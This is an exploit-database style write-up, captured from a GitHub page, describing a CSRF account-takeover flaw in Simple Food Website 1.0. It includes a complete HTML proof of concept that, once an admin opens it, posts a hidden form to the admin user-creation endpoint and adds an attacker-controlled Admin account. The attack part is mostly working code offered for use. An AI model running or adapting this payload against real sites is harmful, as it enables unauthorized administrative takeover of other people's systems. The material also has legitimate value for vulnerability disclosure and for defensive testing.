Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
# Exploit Title: Simple Food Website 1.0 : Account Takeover via CSRF
### Date: 25-04-2022
### Exploit Author: Saket Saurav
### Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html
### Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code
### Version: 1.0
### Tested on: Kali Linux 2020
### Description : An attacker will send the specially crafted HTML page to the Admin. If the admin clicks on the link when logged in his browser session, the attacker will get added to the web portal as Admin taking over admin's account
Below is the POC (exploit.html)
<html>
<!-- CSRF PoC - generated by saket saurav -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/food/admin/save_user.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="full&#95;name" value="csrf&#32;user" />
<input type="hidden" name="username" value="csrf" />
<input type="hidden" name="password" value="csrf" />
<input type="hidden" name="position" value="Admin" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>